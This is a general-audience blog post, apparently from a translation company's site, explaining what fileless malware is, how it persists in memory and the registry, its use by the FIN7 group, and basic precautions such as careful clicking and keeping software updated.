Fileless Malware-They Exist and are More Dangerous

A shortened term for malicious software, malware generally refers to a wide variety of harmful, intrusive, or hostile software. The term includes worms, viruses, ransomware, adware, spyware, Trojan horses, scareware, and other ill-intentioned software. Generally, these malicious software are spread through files. Software, after all, entails the presence of some file to serve as the installer, the executable file itself, or an infected file that carries the malicious codes. However, there are so called fileless malware, which don’t operate in the same way typical malware works – and they’re posing a significant threat.

What is a Fileless Malware?

As the name implies, a fileless malware is a malicious software that does not require a file to infect a system and be spread. What it does is it stays in the RAM or the registry of a computer i.e. the malware code is stored in the RAM or registry of a computer. It is considered as an advanced volatile threat (AVT) spread through the use of so-called PowerShells or carefully crafted scripts to infect a host. With this, a fileless malware can infect a vulnerable system without the need to write files to the local hard drive. It only needs to gain administrative rights in the system. Such admin rights can be obtained by taking advantage of a vulnerability or through other attacks that can lead to privilege escalation.

How It Works

The fileless malware attacks that have been found generally operate through administrative and security testing tools (examples: PowerShell, Mimikatz, and Metasploit). As mentioned earlier, these need to gain the necessary admin rights to a device so that they can execute a hidden command. The exact process or mechanism varies depending on the goal designed for the malware. In some cases, the attack may utilize a file, a .doc email attachment for example, which delivers the code to the memory of a device.

The window of time expected for an attack is difficult to ascertain or is broadly unknown since the malware does not depend on endpoints to sustain connectivity. An attack can be immediately terminated if the device is made to reboot or restart. Still, cybercriminals may implement a backup plan (in cases of rebooting) by planting registry entries to support ongoing attacks. These registry entries can initiate scripts even after a device has been rebooted.

Fileless malware use the affected system’s own commands for the execution of an attack.  Examples of such system commands that are likely to be used are the commands for establishing network connection, the configuration of a proxy IP address, and the assignment of static IP addresses. These commands can be invoked sans the intention and permission of a device’s owner and be used to further execute a cyber attack.

Since most anti-malware software may not be able to properly detect fileless malware yet, it is very important to educate computer users on how to avoid the problem. Suspicious sites and web apps should be avoided. Ads on popup or modal windows should be properly closed. Email attachments should be carefully dealt with. In workplaces that have employees who have difficulties understanding their computer interfaces, business software, or website, it might be necessary to use localization services to make sure nobody falls prey to deceitful schemes. Everything in their computers should be clearly translated or localized to avoid double clicking on camouflaged executable files or to avoid using malicious web apps unwittingly.

Prevalence and Threat

Fortunately, fileless malware are not yet that prevalent. Instances of fileless malware attacks are still too few as compared to the number of other malware attacks. It’s important to emphasize, though, that the threat they pose is significantly higher. They are also being increasingly used especially on financial institutions. Because of their stealthy action and minimal footprint, many cybercriminals are expected to turn to them.

As posited in this post’s title, fileless malware can be more dangerous mainly because they are difficult to detect. Because they don’t work in the same way other malware do, not many antivirus or anti-malware systems get to detect them. Because of this nondetection, antiviruses also fail to create a corresponding signature definition. As such, even if the malware was already detected elsewhere, the information about the detected malware cannot be easily shared with others so stopping further infection becomes difficult.

Also adding to the threat of stealthiness is flexibility of fileless malware. They can be strung together with other cyber attacks to enable multiple payload delivery. Security experts say they have already identified instances when fileless malware are paired with cryptographic modules to be used in ransomware.

Recent Attacks

Just recently, it was discovered that fileless malware have been targeting restaurants in the United States. Of note, most antivirus or anti-malware programs failed to detect these attacks. The use of fileless malware attacks is believed to be something mainly attributed to state-sponsored or government spies. In recent days though, cybercriminals have been found to be harnessing the fileless strategy. One established hacking group, FIN7, for example, is reportedly making use of this attack according to a blog posted by security specialist Morphisec.

Addressing the Threat

For now, nothing much can be said to warn everyone about fileless malware infections except for the usual need to be careful in clicking anything whose origin you can’t be sure of. Security firms are still in the process of finding a way to address the fileless malware problem. The best that can be done is to be more careful in dealing with files and web apps. Also, it’s important to always upgrade system software and perhaps it would also help shutting down computers when not in use or restarting them occasionally.

Author bio:

Bernadine Racoma is a senior content writer at Day Translations, a human translation services company. She has notable fondness for things related to technology, travel, lifestyle, and current affairs. She is also an advocate and mother to 7 successful children.


Go to Smartblog Theme Options -> Ad Management to enter your ad code (300x250)

No comments yet.

Leave a Comment